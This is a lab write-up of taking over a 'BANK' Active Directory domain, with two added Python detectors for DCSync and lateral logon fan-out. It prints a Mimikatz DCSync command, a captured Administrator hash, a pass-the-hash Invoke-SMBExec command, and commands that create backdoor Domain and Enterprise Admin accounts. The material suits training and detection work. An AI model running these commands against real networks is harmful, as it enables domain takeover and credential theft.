Full Compromise of BANK Domain
Last updated
Powershell
Mimikatz
PsExec
Invoke-SMBExec.ps1
Remmina
Windows Remote Desktop
Within the context of the Administrator impersonated by our golden ticket, we are able to retrieve the hash of the local Administrator. With this, we use SMBExec to create our own user equipped with all the rights necessary to do anything on the rootdc. From there we are able to connect to the bankdc, create our own user in the bank domain and, with these users, place the proof of compromise on all reachable machines.
From the child domain, we are not able to reach the bankdc directory.
As already mentioned in the previous section, we use the web server running on the attack machine and the VPN to fetch the tools PsExec and SMBExec.
We start a second PowerShell as Administrator to run PsExec, which lets us validate the commands dropped via SMBExec.
Running PsExec in the context of the Administrator we impersonate through the golden ticket, we are able to connect to the rootdc and get a command line.
With the connection established, we try to add our rootdc user, but are not able to do so:
New-ADUser 0xb0b_rootdc
Add-ADGroupMember -Identity 'Enterprise Admins' -Members 0xb0b_rootdc
Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b_rootdc
Set-ADAccountPassword -Identity 0xb0b_rootdc -NewPassword (ConvertTo-SecureString -AsPlainText 'WhoKnows1337Me!' -Force)
Enable-ADAccount -Identity '0xb0b_rootdc'
The next idea is to retrieve the Administrator hash we originally wanted in the Full Compromise Parent Domain section. Now, within the context of the golden ticket, we are able to retrieve the hash using the SID we already obtained in the last section.
lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500
Without golden ticket administrator impersonation:
With golden ticket administrator impersonation:
And we have the Administrator hash: 58a478135a93ac3bf058a5ea0e8fdb71
With this hash we can pass the hash to SMBExec and drop our commands on the rootdc to add a user there. We get no output back, but the PsExec session we still have open comes in handy, because it lets us check whether each command succeeded.
As a first test we run Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "mkdir C:\Test" -verbose to create a directory on the C:\ drive of the rootdc.
And we check in the PsExec session that it is there:
Now we add a user to ROOTDC that lets us access BANKDC, giving that user the full portfolio of rights by adding it to the Domain Admins and Enterprise Admins groups.
Everything runs through and the rootdc user is created.
And we have a user on rootdc.
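The two steps above, a DCSync-style replication request against the rootdc and a freshly created account being dropped straight into Domain Admins and Enterprise Admins, both leave traces in the Security log of the domain controller. The following detection example is added here and is not part of the original write-up or of any tool it uses: it correlates Event ID 4662 (object access with the replication control-access rights) and 4720 (account created) with 4728/4756 (member added to a global/universal security group). The event records, the account names j.doe and svc_backup, the host name CORPDC and the one-hour window are constructed assumptions; the two replication GUIDs are the real directory control-access-right values.

```python
"""Added detection example (not part of the original write-up): correlate
Windows Security events to surface a DCSync replication request made by a
non-DC account (4662) and a newly created account (4720) that is added to
Domain Admins or Enterprise Admins (4728 / 4756) shortly afterwards.
All event records below are constructed."""
from datetime import datetime, timedelta

# Control-access-right GUIDs that allow pulling directory replication data.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins"}
GROUP_ADD_EVENT_IDS = {4728, 4756}  # member added to global / universal security group


def member_name(dn_or_name):
    """4728/4756 carry the member as a DN; reduce it to the CN so it can be matched to 4720."""
    first = dn_or_name.split(",")[0]
    return first[3:] if first.upper().startswith("CN=") else first


def is_dc_account(user):
    # Domain controllers replicate with their machine accounts, which end in '$'.
    return user.endswith("$")


def detect_dcsync(events):
    """Return 4662 events where a user (not a DC machine account) exercised replication rights."""
    hits = []
    for ev in events:
        if ev["EventID"] != 4662:
            continue
        if not REPLICATION_GUIDS & set(ev.get("Properties", [])):
            continue
        if is_dc_account(ev["SubjectUserName"]):
            continue
        hits.append({"time": ev["Time"], "user": ev["SubjectUserName"], "rule": "dcsync"})
    return hits


def detect_new_privileged_member(events, window=timedelta(hours=1)):
    """Flag accounts added to a privileged group within `window` of their creation."""
    created = {}  # account name -> creation time (from 4720)
    hits = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"]] = ev["Time"]
        elif ev["EventID"] in GROUP_ADD_EVENT_IDS and ev["TargetUserName"] in PRIVILEGED_GROUPS:
            member = member_name(ev["MemberName"])
            born = created.get(member)
            if born is not None and ev["Time"] - born <= window:
                hits.append({"time": ev["Time"], "user": member, "group": ev["TargetUserName"],
                             "by": ev["SubjectUserName"], "rule": "new-account-privileged"})
    return hits


T0 = datetime(2023, 1, 1, 10, 0, 0)
# Constructed sample events; field names follow the Security log XML for these IDs.
SAMPLE_EVENTS = [
    # Normal replication between domain controllers: machine account, must not fire.
    {"EventID": 4662, "Time": T0, "SubjectUserName": "CORPDC$",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
    # Replication rights exercised by an ordinary user account: DCSync indicator.
    {"EventID": 4662, "Time": T0 + timedelta(minutes=5), "SubjectUserName": "j.doe",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    # Account creation followed by privileged group membership within minutes.
    {"EventID": 4720, "Time": T0 + timedelta(minutes=20), "SubjectUserName": "Administrator",
     "TargetUserName": "0xb0b_rootdc"},
    {"EventID": 4728, "Time": T0 + timedelta(minutes=21), "SubjectUserName": "Administrator",
     "TargetUserName": "Domain Admins",
     "MemberName": "CN=0xb0b_rootdc,CN=Users,DC=thereserve,DC=loc"},
    {"EventID": 4756, "Time": T0 + timedelta(minutes=22), "SubjectUserName": "Administrator",
     "TargetUserName": "Enterprise Admins",
     "MemberName": "CN=0xb0b_rootdc,CN=Users,DC=thereserve,DC=loc"},
    # Long-standing account added to a privileged group: worth reviewing, but outside this rule.
    {"EventID": 4728, "Time": T0 + timedelta(minutes=30), "SubjectUserName": "Administrator",
     "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc_backup,CN=Users,DC=thereserve,DC=loc"},
]


def run(events=SAMPLE_EVENTS):
    """Run both rules and return the combined list of hits."""
    return detect_dcsync(events) + detect_new_privileged_member(events)


if __name__ == "__main__":
    for hit in run():
        print(hit)
```

The DCSync rule keys on the account rather than the source address because replication is legitimate only between domain controllers; a tuned version would also allowlist dedicated sync accounts (Azure AD Connect and similar) by name. The second rule deliberately ignores old accounts being promoted, which is a separate, noisier signal best reviewed through change control.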
Checking the domains involved via Active Directory Domains and Trusts on the child domain controller corpdc.
And from the corpdc we are able to connect to the rootdc via Windows Remote Desktop using our newly created rootdc user.
And from the corpdc we are able to connect to the bankdc via Windows Remote Desktop using our newly created rootdc user.
From there we are still not able to place our proof of compromise on all the machines in the bank domain, because our rootdc user doesn't exist here. So we create another user, 0xb0b, on the bankdc.
Next, we try to place our proof of compromise on all machines using runas, so we don't have to use RDP for every single machine.
To avoid entering a password every time we run runas, we just open a cmd as bank\0xb0b, where /k keeps the terminal open, and run our commands from there to place our proofs.
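Working through every machine from one cmd session like this produces a burst of network logons (Event ID 4624, logon type 3) for the same account from the same source address on many different hosts within a few minutes, which is a pattern worth alerting on. The example below is added here and is not part of the original write-up: it groups 4624 events collected from the member servers by (account, source IP) and raises one alert when an actor reaches at least three distinct hosts inside a sliding ten-minute window. The event records, host names BANKDC, BANK-WS1 and BANK-WS2, the accounts admin.ops and svc_backup, the addresses and the thresholds are all constructed assumptions.

```python
"""Added detection example (not part of the original write-up): flag one
account fanning out to many hosts over network logons in a short window,
using Security events (4624, logon type 3) gathered from the target hosts.
All records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta


def detect_fan_out(events, min_hosts=3, window=timedelta(minutes=10)):
    """Return one alert per (account, source IP) that logged on to >= min_hosts distinct
    hosts within `window`. Only successful network logons (type 3) are considered."""
    by_actor = defaultdict(list)  # (account, source ip) -> [(time, host)]
    for ev in events:
        if ev["EventID"] == 4624 and ev["LogonType"] == 3:
            by_actor[(ev["TargetUserName"], ev["IpAddress"])].append((ev["Time"], ev["Computer"]))

    alerts = []
    for (user, ip), seq in by_actor.items():
        seq.sort()
        for i, (t_start, _) in enumerate(seq):
            # Sliding window anchored at each logon; stop at the first one that trips the rule.
            hosts = {host for t, host in seq[i:] if t - t_start <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"user": user, "source": ip, "hosts": sorted(hosts),
                               "first_seen": t_start, "rule": "lateral-fan-out"})
                break
    return alerts


T0 = datetime(2023, 1, 1, 14, 0, 0)


def logon(minutes, user, ip, host):
    """Build a constructed 4624 record with the fields the rule needs."""
    return {"EventID": 4624, "LogonType": 3, "Time": T0 + timedelta(minutes=minutes),
            "TargetUserName": user, "IpAddress": ip, "Computer": host}


# Constructed sample: one account sweeping three hosts in four minutes, a service
# account touching two hosts, and an admin visiting three hosts spread over two hours.
SAMPLE_LOGONS = [
    logon(0, "0xb0b", "10.200.103.21", "BANKDC"),
    logon(2, "0xb0b", "10.200.103.21", "BANK-WS1"),
    logon(4, "0xb0b", "10.200.103.21", "BANK-WS2"),
    logon(1, "svc_backup", "10.200.103.50", "BANKDC"),
    logon(3, "svc_backup", "10.200.103.50", "BANK-WS1"),
    logon(0, "admin.ops", "10.200.103.10", "BANKDC"),
    logon(60, "admin.ops", "10.200.103.10", "BANK-WS1"),
    logon(120, "admin.ops", "10.200.103.10", "BANK-WS2"),
]

if __name__ == "__main__":
    for alert in detect_fan_out(SAMPLE_LOGONS):
        print(alert)
```

Thresholds need baselining per environment: a jump host used by the help desk will legitimately fan out, so in practice the rule is scoped to sensitive accounts or paired with an allowlist of known administrative sources.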